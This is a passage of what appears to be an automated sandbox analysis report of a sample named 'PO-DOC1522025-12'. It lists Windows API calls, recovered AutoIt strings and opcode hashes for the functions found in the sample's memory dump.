                                                                                    • Opcode ID: 849e7135b00b5d329598c41e81aa550b236eb50135ee9d16d8797fec4c16cd00
                                                                                    • Instruction ID: bf15afba8726334addbc7097291549a00c1b66dbe7a856ffedaed916f494ffbc
                                                                                    • Opcode Fuzzy Hash: 849e7135b00b5d329598c41e81aa550b236eb50135ee9d16d8797fec4c16cd00
                                                                                    • Instruction Fuzzy Hash: 5661C370608301AFD711DF54C889F6ABBE4EF69714F00891DF9959B2A1D770EE48CB92
                                                                                    APIs
                                                                                      • Part of subcall function 00159BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00159BB2
                                                                                      • Part of subcall function 0015912D: GetCursorPos.USER32(?), ref: 00159141
                                                                                      • Part of subcall function 0015912D: ScreenToClient.USER32(00000000,?), ref: 0015915E
                                                                                      • Part of subcall function 0015912D: GetAsyncKeyState.USER32(00000001), ref: 00159183
                                                                                      • Part of subcall function 0015912D: GetAsyncKeyState.USER32(00000002), ref: 0015919D
                                                                                    • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 001D8B6B
                                                                                    • ImageList_EndDrag.COMCTL32 ref: 001D8B71
                                                                                    • ReleaseCapture.USER32 ref: 001D8B77
                                                                                    • SetWindowTextW.USER32(?,00000000), ref: 001D8C12
                                                                                    • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 001D8C25
                                                                                    • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 001D8CFF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                                    • String ID: @GUI_DRAGFILE$@GUI_DROPID$p#!
                                                                                    • API String ID: 1924731296-820919411
                                                                                    • Opcode ID: 48afc230e53b759df8f28bac9feb3bf8a83ed96bb7cb9d624355654c90293f25
                                                                                    • Instruction ID: 2fd38cefc762e5a6e1cde0adf8f8417b016110b6096cd2bafb43471713bbafc5
                                                                                    • Opcode Fuzzy Hash: 48afc230e53b759df8f28bac9feb3bf8a83ed96bb7cb9d624355654c90293f25
                                                                                    • Instruction Fuzzy Hash: FF51AC70205300AFD704DF14DC9AFAA77E4FB98710F000A2EF966972E1DB70A954CBA2
                                                                                    APIs
                                                                                    • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 001B33CF
                                                                                      • Part of subcall function 00149CB3: _wcslen.LIBCMT ref: 00149CBD
                                                                                    • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 001B33F0
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: LoadString$_wcslen
                                                                                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                                    • API String ID: 4099089115-3080491070
                                                                                    • Opcode ID: e7cca34107e5ee14919a8213a327e1db8124ec0d9a36de3417cf1450c06c3718
                                                                                    • Instruction ID: 62c575dc89f6ba4c62de2394e30dc384a4edf870030e7e2fc64da3955ac13335
                                                                                    • Opcode Fuzzy Hash: e7cca34107e5ee14919a8213a327e1db8124ec0d9a36de3417cf1450c06c3718
                                                                                    • Instruction Fuzzy Hash: 6F51907290020AAADF15EBE0DD46EEEB778AF25340F104165F515720A2EB316FA8DB61
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcslen$BuffCharUpper
                                                                                    • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                                    • API String ID: 1256254125-769500911
                                                                                    • Opcode ID: cae36faeb0112128c1b4e21a17ebeaaf5375141cf3a953a7c10d5723a8f2b109
                                                                                    • Instruction ID: df4484db94f4cfb13c562dd48f70e79270ca9179c6cf0d0ee7c11439b9a26e74
                                                                                    • Opcode Fuzzy Hash: cae36faeb0112128c1b4e21a17ebeaaf5375141cf3a953a7c10d5723a8f2b109
                                                                                    • Instruction Fuzzy Hash: 88413936A081678BCB105F7DCCD05BEB7A1EF72754B254129E429DB282E731CC81C390
                                                                                    APIs
                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 001B53A0
                                                                                    • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 001B5416
                                                                                    • GetLastError.KERNEL32 ref: 001B5420
                                                                                    • SetErrorMode.KERNEL32(00000000,READY), ref: 001B54A7
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Error$Mode$DiskFreeLastSpace
                                                                                    • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                    • API String ID: 4194297153-14809454
                                                                                    • Opcode ID: 56f7f78bc32b1745e098f2668714aec8049089bae6413de437770e550fcc63e1
                                                                                    • Instruction ID: 644d5c97d02463f932258ad0b71a709764fb002837ae146bdc53d1a6e7eda986
                                                                                    • Opcode Fuzzy Hash: 56f7f78bc32b1745e098f2668714aec8049089bae6413de437770e550fcc63e1
                                                                                    • Instruction Fuzzy Hash: 9B31A135A00605DFD714DF68C488BEABBB5EF55305F148065E405CF2A2EB71ED86CBA0
                                                                                    APIs
                                                                                    • CreateMenu.USER32 ref: 001D3C79
                                                                                    • SetMenu.USER32(?,00000000), ref: 001D3C88
                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 001D3D10
                                                                                    • IsMenu.USER32(?), ref: 001D3D24
                                                                                    • CreatePopupMenu.USER32 ref: 001D3D2E
                                                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 001D3D5B
                                                                                    • DrawMenuBar.USER32 ref: 001D3D63
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                    • String ID: 0$F
                                                                                    • API String ID: 161812096-3044882817
                                                                                    • Opcode ID: 4aa73e0173ea4efcc5bfec58dda3a7cbf0c682134870f011745b8095f9d42431
                                                                                    • Instruction ID: de40995df5db21721d3ef82138ab9519ad11fa9f2e757dc2a2bd5634c2699962
                                                                                    • Opcode Fuzzy Hash: 4aa73e0173ea4efcc5bfec58dda3a7cbf0c682134870f011745b8095f9d42431
                                                                                    • Instruction Fuzzy Hash: 43417E75A0260AEFDF14CFA4E844ADA77B6FF49350F14052AF95697360D730AA10CF91
                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 001D3A9D
                                                                                    • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 001D3AA0
                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 001D3AC7
                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 001D3AEA
                                                                                    • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 001D3B62
                                                                                    • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 001D3BAC
                                                                                    • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 001D3BC7
                                                                                    • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 001D3BE2
                                                                                    • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 001D3BF6
                                                                                    • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 001D3C13
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$LongWindow
                                                                                    • String ID:
                                                                                    • API String ID: 312131281-0
                                                                                    • Opcode ID: 5cb6f9cd3e54ac3624e50a11c91c4524dac2eeb85051e6e5a2aa85706ed33f4f
                                                                                    • Instruction ID: 6ae1a3f6e54c0d606741af4f1d593ea292b855acd1c33621dcf672e7e5663d41
                                                                                    • Opcode Fuzzy Hash: 5cb6f9cd3e54ac3624e50a11c91c4524dac2eeb85051e6e5a2aa85706ed33f4f
                                                                                    • Instruction Fuzzy Hash: B0616A75A00208AFDB10DFA8CC85EEE77B8EB19700F10419AFA25A73A1D770AE55DB50
                                                                                    APIs
                                                                                    • _free.LIBCMT ref: 00172C94
                                                                                      • Part of subcall function 001729C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0017D7D1,00000000,00000000,00000000,00000000,?,0017D7F8,00000000,00000007,00000000,?,0017DBF5,00000000), ref: 001729DE
                                                                                      • Part of subcall function 001729C8: GetLastError.KERNEL32(00000000,?,0017D7D1,00000000,00000000,00000000,00000000,?,0017D7F8,00000000,00000007,00000000,?,0017DBF5,00000000,00000000), ref: 001729F0
                                                                                    • _free.LIBCMT ref: 00172CA0
                                                                                    • _free.LIBCMT ref: 00172CAB
                                                                                    • _free.LIBCMT ref: 00172CB6
                                                                                    • _free.LIBCMT ref: 00172CC1
                                                                                    • _free.LIBCMT ref: 00172CCC
                                                                                    • _free.LIBCMT ref: 00172CD7
                                                                                    • _free.LIBCMT ref: 00172CE2
                                                                                    • _free.LIBCMT ref: 00172CED
                                                                                    • _free.LIBCMT ref: 00172CFB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                    • String ID:
                                                                                    • API String ID: 776569668-0
                                                                                    • Opcode ID: 2baf68e42677bab7ec403361dcfab9c94e36466ff95845822e41e8aa746aaee6
                                                                                    • Instruction ID: 5812c7a037441d541cf340bbb0ccae2e9635aaadb43f0c079ef29f593c2aad59
                                                                                    • Opcode Fuzzy Hash: 2baf68e42677bab7ec403361dcfab9c94e36466ff95845822e41e8aa746aaee6
                                                                                    • Instruction Fuzzy Hash: 3D11C376100118AFCB02EF64D882CDD7BB5FF19354F4584A4FA4C9B222DB31EA919B90
                                                                                    APIs
                                                                                    • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00141459
                                                                                    • OleUninitialize.OLE32(?,00000000), ref: 001414F8
                                                                                    • UnregisterHotKey.USER32(?), ref: 001416DD
                                                                                    • DestroyWindow.USER32(?), ref: 001824B9
                                                                                    • FreeLibrary.KERNEL32(?), ref: 0018251E
                                                                                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0018254B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                    • String ID: close all
                                                                                    • API String ID: 469580280-3243417748
                                                                                    • Opcode ID: c3a5bfb353b2eceee935e694e0fa12ff9a5b8a6abdb6c790f3570980e48090e4
                                                                                    • Instruction ID: d1f67b834ec18a870cfdf7fd0dd9c75832527e6cf3f84fbaa3a2060cc3346bd4
                                                                                    • Opcode Fuzzy Hash: c3a5bfb353b2eceee935e694e0fa12ff9a5b8a6abdb6c790f3570980e48090e4
                                                                                    • Instruction Fuzzy Hash: 7FD17131702212DFCB1AEF14D499B69F7A4BF15700F2542ADE84A6B262DB30ED56CF90
                                                                                    APIs
                                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 001B7FAD
                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 001B7FC1
                                                                                    • GetFileAttributesW.KERNEL32(?), ref: 001B7FEB
                                                                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 001B8005
                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 001B8017
                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 001B8060
                                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 001B80B0
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: CurrentDirectory$AttributesFile
                                                                                    • String ID: *.*
                                                                                    • API String ID: 769691225-438819550
                                                                                    • Opcode ID: 7558e4092b0793f039ab0a387a5ca65a525c92b7441749133b79dad07adad356
                                                                                    • Instruction ID: 63deb88b8c04e97fc869f08748b1236ced7edc80212617a7c9764f8b602a7033
                                                                                    • Opcode Fuzzy Hash: 7558e4092b0793f039ab0a387a5ca65a525c92b7441749133b79dad07adad356
                                                                                    • Instruction Fuzzy Hash: 4F818F725082019BCB24EF14C844AAEB3E8BFD9754F144C5EF885DB2A0EB35DD49CB92
                                                                                    APIs
                                                                                    • SetWindowLongW.USER32(?,000000EB), ref: 00145C7A
                                                                                      • Part of subcall function 00145D0A: GetClientRect.USER32(?,?), ref: 00145D30
                                                                                      • Part of subcall function 00145D0A: GetWindowRect.USER32(?,?), ref: 00145D71
                                                                                      • Part of subcall function 00145D0A: ScreenToClient.USER32(?,?), ref: 00145D99
                                                                                    • GetDC.USER32 ref: 001846F5
                                                                                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00184708
                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00184716
                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 0018472B
                                                                                    • ReleaseDC.USER32(?,00000000), ref: 00184733
                                                                                    • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 001847C4
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                    • String ID: U
                                                                                    • API String ID: 4009187628-3372436214
                                                                                    • Opcode ID: 79110dd7ab7949b648bf1e5cf4dc2a996157d0763199f4d4c40d0a5d22b46fc1
                                                                                    • Instruction ID: d6390585c9df76f052e5e05c9a4c817f62e71aaddd0df34b6386fbfdb95ab669
                                                                                    • Opcode Fuzzy Hash: 79110dd7ab7949b648bf1e5cf4dc2a996157d0763199f4d4c40d0a5d22b46fc1
                                                                                    • Instruction Fuzzy Hash: 73712430400206DFCF25EF64C984AFA3BB6FF5A360F24422AED515A266CB308E81DF50
                                                                                    APIs
                                                                                    • LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 001B35E4
                                                                                      • Part of subcall function 00149CB3: _wcslen.LIBCMT ref: 00149CBD
                                                                                    • LoadStringW.USER32(00212390,?,00000FFF,?), ref: 001B360A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: LoadString$_wcslen
                                                                                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                    • API String ID: 4099089115-2391861430
                                                                                    • Opcode ID: 5457b6998582b834f69f03c43c326c13b7d4405d73d3f879bac4ff526b9a0ddf
                                                                                    • Instruction ID: b8c0a9de77efae07e9a3c7d6890ad8969312bea64b2fbd8d7f776ceb25ed6541
                                                                                    • Opcode Fuzzy Hash: 5457b6998582b834f69f03c43c326c13b7d4405d73d3f879bac4ff526b9a0ddf
                                                                                    • Instruction Fuzzy Hash: 2C51607290020ABADF14EFA0DC46EEEBB78AF25300F144165F515721A2DF311BA9DFA1
                                                                                    APIs
                                                                                    • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 001BC272
                                                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 001BC29A
                                                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 001BC2CA
                                                                                    • GetLastError.KERNEL32 ref: 001BC322
                                                                                    • SetEvent.KERNEL32(?), ref: 001BC336
                                                                                    • InternetCloseHandle.WININET(00000000), ref: 001BC341
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                    • String ID:
                                                                                    • API String ID: 3113390036-3916222277
                                                                                    • Opcode ID: a599e7b3fe8cf7e937dcf8e93af8a2c9d9ebf8f4ea4b44cdf9599be449650e20
                                                                                    • Instruction ID: c9e676346adff867f74b3a270fea34c6982442845a6dd7d09aabefb177a5e480
                                                                                    • Opcode Fuzzy Hash: a599e7b3fe8cf7e937dcf8e93af8a2c9d9ebf8f4ea4b44cdf9599be449650e20
                                                                                    • Instruction Fuzzy Hash: DF319AB1601208AFD7219FA58C88AEB7BFCFB99740B54891EF486D2210DB34DD44CBE0
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00183AAF,?,?,Bad directive syntax error,001DCC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 001A98BC
                                                                                    • LoadStringW.USER32(00000000,?,00183AAF,?), ref: 001A98C3
                                                                                      • Part of subcall function 00149CB3: _wcslen.LIBCMT ref: 00149CBD
                                                                                    • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 001A9987
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: HandleLoadMessageModuleString_wcslen
                                                                                    • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                    • API String ID: 858772685-4153970271
                                                                                    • Opcode ID: 7398d01e21f9f935482a2a09b2b258f9bfc62675c77e13e00e2b28cf1537d9a6
                                                                                    • Instruction ID: 1a07a6baaa55814c67c01e21c433dd1fdbb35f4246b88384d2da8f912bc22a31
                                                                                    • Opcode Fuzzy Hash: 7398d01e21f9f935482a2a09b2b258f9bfc62675c77e13e00e2b28cf1537d9a6
                                                                                    • Instruction Fuzzy Hash: 99218D3280021AFBDF15AF90CC0AEEE7779BF29704F04446AF515660A2EB319668DB50
                                                                                    APIs
                                                                                    • GetParent.USER32 ref: 001A20AB
                                                                                    • GetClassNameW.USER32(00000000,?,00000100), ref: 001A20C0
                                                                                    • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 001A214D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: ClassMessageNameParentSend
                                                                                    • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                    • API String ID: 1290815626-3381328864
                                                                                    • Opcode ID: a9a34fb94e284435bc2e179a994ae9e97604f7d4bd95cad77888119ab81cc959
                                                                                    • Instruction ID: 4fadaeb7ddad6fe93b3e58544bffd2585131c153934d40d5d1c0a493f870697e
                                                                                    • Opcode Fuzzy Hash: a9a34fb94e284435bc2e179a994ae9e97604f7d4bd95cad77888119ab81cc959
